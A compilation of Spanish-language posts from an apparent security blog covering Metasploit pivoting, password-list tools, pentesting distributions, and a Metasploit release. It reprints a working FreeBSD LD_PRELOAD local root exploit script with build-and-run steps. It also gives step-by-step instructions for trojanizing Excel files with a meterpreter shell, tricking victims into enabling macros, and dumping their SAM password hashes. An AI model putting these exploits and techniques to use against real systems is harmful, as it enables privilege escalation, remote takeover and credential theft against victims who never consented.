[*] Documentos

[*] Videos

Visita Taxonomía de un  Ataque con<< Backtrack 4

También puede interesarte...

• Foro de BackTrack en Español
• Security Freak – Videos de iniciacion en seguridad de la informacion
• El arte de ocultar información – Esteganografía
• ¿Cómo tomar control de un Dominio en Windows?
• La arquitectura de seguridad OSI
• Backtrack 4 Final
• El reemplazo de Milw0rm
• Videos de las Jornadas de Seguridad Informatica ArCERT

Veamos un ejemplo:

Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el  amado  y conocido Metasploit nos puede ser muy útil.

El primer paso obviamente  es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:

use [exploit que ataca la vulnerabilidad encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-la-vulnerabilidad-encontrada

Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:

sessions -l

El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:

msf> route add [ip_maquina_objetivo] [Mascara  de red] [ID-Session]

Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:

msf> use [exploit_necesario]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [maquina_objetivo]
msf> exploit

De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática

También puede interesarte...

• ¿Cómo tomar control de un Dominio en Windows?
• Video: Explotando WM Downloader
• Video Tutorial Fingerprint y Escaneo Básico
• Todos los Vídeos de AntiChat – Parte I
• Todos los Vídeos de AntiChat – Parte II
• Creando un Exploit Paso a Paso
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• X.25 Conferencia de Seguridad Informática en Mexico

Para reafirmar el uso de Firefox como Herramienta de Seguridad les presento FireCAT, un completo catalogo de las extensiones para Firefox, que están especialmente diseñadas para su uso en una auditoria de seguridad:

En la comunidad ya habíamos hablado del FireCAT en su versión 1.5, en esa ocasión, se había publicado el catalogo de extensiones para realizar auditorias con firefox en PDF y html, con esta nueva versión 1.6 el FireCAT pasa a estar disponible de forma online, en un mapa mas interactivo creado en flash:

Espero que les sea de utilidad y encuentren algunos buenos plugins que no conocian.

Mas Información:
Pagina Oficial del FireCAT

También puede interesarte...

• Backtrack 4 Final
• Top 100 Herramientas de Seguridad Open Source
• WEPBuster, automatizando la auditoría de redes inalámbricas
• Dradis, organiza y comparte información en un Test de Penetración
• NetworkMiner, Herramienta forense de Análisis de Red
• Descargar Gratis Internet Explorer 8 Final
• Browser Ride – Explota tu Navegador
• Gana Mas Espacio para Navegar con tu Firefox

Lo que diferencia CeWL de cualquier otra herramienta para generar listas de passwords, es que extrae las palabras claves desde una url, por lo que la lista generada es mas especifica y puede incluir palabras que no se encuentran en las tipicas listas de password, pero que posiblemente este siendo usada como clave por algun usuario del sistema.

El modo de uso de CeWL es el siguiente: cewl [opcion u opciones] URL, teniendo como opciones los siguientes parametros:

–help, -h

Muestra ayuda

–depth x, -d x

Nivel de profundida del escaneo

–min_word_length, -m

Tamaño minimo de cada palabra, util si no deseamos llenar la lista con palabras como “de”, “la”, “por”,etc..

–offsite, -o

Por defecto CeWL solo revisa una url especifica, con esta opcion escaneara tambien enlaces externos.

–write, -w file

Escribe la salida del CeWL en un archivo

–ua, -u user-agent

Cambia el user-agent

-v

Utiliza el modo Verbose,  mostrando mas informacion de salida

–no-words, -n

No muestra la lista

–meta, -a

Incluye meta datos

–email, -e

Incluye correos encontrados

–meta-temp-dir directory

Especifica el directorio utilizado por exiftool para convertir los archivos, por defecto es /tmp

URL

La url a escanear

Descargar CeWL Generador de Diccionarios Basado en URL`s

Mas Información:
Pagina Oficial del CeWL

También puede interesarte...

• Como Recuperar Clave MySQL
• Nueva versión de Cain & Abel
• Las Peores 500 Contraseñas de Todos los Tiempos
• Cómo recuperar una clave en MD5
• Bruter – Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows
• ¿Como Eliminar la Contraseña de un PDF?
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux

Metasploit Framework, fue escrito inicialmente utilizando el lenguaje de programación de scripting Perl, aunque actualmente ha sido escrito de nuevo completamente en el lenguaje Ruby. El proyecto Metaspoit acaba de anuncia la nueva versión del Metasploit Framework, que incluye entre otras, las siguientes novedades:

• Metasploit ahora tiene 463 exploits y 219 módulos auxiliary (comparado con los 453 y 218 respectivamente en la v3.3.1).
• El payload Meterpreter es ahora multi-hilo, permitiendo manejar varias peticiones al tiempo.
• El Meterpreter es mas estable y robusto para la mayoría de los casos.
• La base de datos subsystem ahora usa ActiveRecord para actualizar las bases de datos.
• para ver todos los cambios en esta versión click aquí.

Descarga la Ultima Versión de Metasploit FrameWork

También puede interesarte...

• Creando un Exploit Paso a Paso
• ¿Cómo tomar control de un Dominio en Windows?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vídeo: Introducción al Metasploit Framework
• Metasploit Framework 3.2 Portable para Windows
• Metasploit Framework Portable
• Ezine Comunidad DragonJAR Online
• Backtrack 4 Final

Felicitaciones a fuurio y el equipo que hizo posible este nuevo espacio para los hispanohablantes.

Entrar al Foro en Español de Back-Track

También puede interesarte...

• Taxonomía de un Ataque con Backtrack 4
• Resultado del Primer Reto Forense de La Comunidad DragonJAR
• ¿Cómo tomar control de un Dominio en Windows?
• Backtrack 4 Final
• El reemplazo de Milw0rm
• E-zine #4 Comunidad DragonJAR
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Curso Completo de Metasploit Framework

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.
VERSIONES DE FREEBSD AFECTADAS
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NO VULNERABLE
FreeBSD 4.9-RELEASE *** NO VULNERABLE

Para más detalles ver el exploit.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF

Para compilar y ejecutar

gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Mas Información en el Full Disclosure publicado por Nikolaos Rangos

También puede interesarte...

• Video: Explotando WM Downloader
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows
• Vídeo: Introducción al Metasploit Framework
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Multiples Vulnerabilidades en SMF
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• XSS que permite postear a atacante registrado en WordPress

En esta ocasión les voy a hablar sobre XLSInjector, una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

• Una Maquina (virtual o real) con Windows
• Microsoft Excel
• Perl
• El modulo Win32:OLE para Perl
• Un archivo XML a infectar
• El XLSInjector
• y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

• iniciamos la consola del metasploit
• una vez en la consola de MSF cargamos el payload de meterpreter
  set payload windows/meterpreter/bind_tcp
• lo configuramos adecuadamente
  set RHOST ipdelpcvictima
set RPOT 4444
• luego lo lanzamos
  exploit

Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo “?” y enter, te arrojara algo parecido a esto:

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes

Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos documentos (Meterpreter.pdf y MSF3-met.html) para que aprendas mas sobre los comandos del meterpreter.

Te recomiendo utilizar el comando migrate tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es hashdump que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como l0phtcrack o cain&abel.

Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector

También puede interesarte...

• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Cómo tomar control de un Dominio en Windows?
• Metasploit Framework 3.3.2
• Multiples Vulnerabilidades en SMF
• Parches para Windows que corrigen Vulnerabilidades Criticas
• zsh: Una shell interactiva más amigable para el usuario
• Firmando Documentos y Correos con GPG
• Cursos Gratis de Informática en el Sena Virtual

La idea principal es que es un conjunto de programas, que pueden ser ejecutados individualmente, sin dependencia de la Suite en sí. Además, el proyecto puede ir creciendo fácilmente grácias a la comunidad, por lo fácil que es implementar nuevos programas individualmente.
El programa es multiplataforma, pero esta orientado a sistemas GNU/Linux. Todas las pruebas se hacen sobre estos y solo a estos se les da un soporte y una garantía de que todo debería funcionar bien. Aún así, PenTBox se puede ejecutar en todos los sistemas que soportan Ruby (MacOS, BSD, DOS, BeOS, OS/2 y más), además de haber desarrollado también una versión funcional para Windows. Se intentan probar todas las funciones en la mayoría de los sistemas soportados, pero como es comprensible no siempre es posible.
¿Y, que programas incluye PenTBox?
Según escribo este artículo, solo existe la versión 1.0 Beta de PenTBox. En líneas generales, el programa tiene las siguientes funciones:

• Crackeador de Hash MD5, SHA1, SHA256 y SHA512 mediante fuerza bruta numérica.
• Creador rápido de
  Honeypot.
• Generador de contraseñas seguras ante  Ataque_de_fuerza_bruta y
  diccionario
  Ataque_de_diccionario.
• Generadores de tráfico masivo en la red para probar posibles denegaciones de servicio.
• Escáner de puertos.
• Otras aplicaciones complementarias o menores …

¿A quién puede serle útil PenTBox?
Tiene un gran sector de público posible. Desde usuarios con conocimientos limitados, que necesitan crear contraseñas seguras o aprender procedimientos de seguridad hasta administradores de sistemas informáticos, que necesiten crear un Honeypot rápido o probar la estabilidad de su red con herramientas de denegación de servicio.

Además de desarrolladores que quieran estudiar el código o la estabilidad de sus aplicaciones, aficionados o expertos en seguridad informática, etcétera.

Instalando PentBox en Nuestro PC

Primero vamos a la zona de descargas de PentBox Zona de Descargas
Nos bajamos el paquete para Windows por ejemplo. Primero instalamos el paquete ruby:

Deespués de instalar el paquete de Ruby ejecutamos el loader.bat
Nos ha de salir algo así:

Continuar leyendo en el foro…

Mas Información:
Pagina Oficial del Proyecto
Pagina del Autor

También puede interesarte...

• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Varias Distribuciones Live CD de Seguridad en un DVD
• Vídeo Tutorial Honeypot
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• X.25 Conferencia de Seguridad Informática en Mexico
• Ciberterrorismo
• Como realizar un borrado seguro usando BleachBit
• ¿Dónde estudiar seguridad informática en Colombia?

En este post vamos a enfocarnos en el repaso de algunas de las mejores distribuciones enfocadas a la Seguridad Informática.

1. BackTrack

Sería algo imposible escribir una lista de distribuciones enfocadas a la Seguridad sin hacer mención de Backtrack. Si eres lector asiduo del blog seguramente ya la conoces, 4v4t4r ha realizado muchos laboratorios haciendo uso de esta distro. La última versión disponible (a la hora de escribir el artículo) es la 4 BETA. Con más de 300 herramientas que la convierte en la distribución preferida por los pentesters. Actualmente basada en Debian/Ubuntu con unos amplios repositorios que permiten extender aún más su funcionalidad. Tanto en este blog como en el de los Laboratorios DragonJAR encontrarás mucha información sobre el uso de esta distribución.

Descargar Backtrack

2. nUbuntu (Network Ubuntu)

Como su nombre lo indica basada en Ubuntu Linux y usa el escritorio Fluxbox. Su objetivo es tener una distribución Linux basada en Ubuntu, personalizada, agregando las herramientas necesarias para realizar pruebas de penetración en servidores y redes; eliminando también aplicaciones que no sean necesarias para este propósito.

Descargar nUbuntu

3. OWASP Live CD

Es una Live-CD que reune algunas de las mejores herramientas open source de seguridad en un sólo lugar. Contiene también documentación y ambientes interactivos de aprendizaje (como WebGoat) promoviendo así la educación en el campo de la Seguridad Web. Para quienes no lo sabía OWASP (acrónimo de Open Web Application Security Project) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. En el blog encontrarás mucha información sobre este proyecto.

Descargar OWASP Live CD

4. Samurai Web Testing Framework

Distribución Live preconfigurada para el pentesting de aplicaciones Web. Incluye muchas herramientas que permiten llevar a cabo fácilmente los 4 pasos básicos en un test de penetración web: Reconocimiento, Mapeo, Descubrimiento, Explotación. Además incluye una Wiki que permite almacenar la información recolectada durante el pentesting. En el blog encuentras más información sobre esta Live-CD.

Descargar Samurai Web Testing Framework

5. Network Security Toolkit

Basada en Fedora, actualmente se encuentra en la versión 1.8.1. Su objetivo es proveer a los administradores de red un completo set de herramientas de seguridad open source. Contiene una gran parte de la lista de las 100 mejores herramientas de seguridad creada por Insecure. Lo fascinante es que permite convertir un PC cualquiera en un sistema diseñado para el análisis de tráfico de red, IDS, monitor de redes inalámbricas, entre otros usos. También util en muchos escenarios para la recuperación de daños.

Descargar NST

Hay muchas distribuciones Linux enfocadas a las auditorías de seguridad, no las menciono en el post debido a que muchas de ellas ya han sido abandonada por sus desarrolladores y no volvieron a lanzar ninguna actualización ni versiones nuevas. De cualquier manera, si interesa conocer algunas de ellas aquí tienes una lista:

• Pentoo
• Knoppix STD
• Notably Auditor
• Phlak

Por nombrar algunas… Y tu, ¿Que otra distribución usas para este propósito?

También puede interesarte...

• Varias Distribuciones Live CD de Seguridad en un DVD
• X.25 Conferencia de Seguridad Informática en Mexico
• Memoria USB Booteable con Varias Distribuciones de Seguridad Informática
• PentBox – Una suite de seguridad y pentesting en ruby
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Dradis, organiza y comparte información en un Test de Penetración
• Bloqueo de sitios Web usando el archivo HOSTS
• Laboratorios Hacking – Técnicas y contramedidas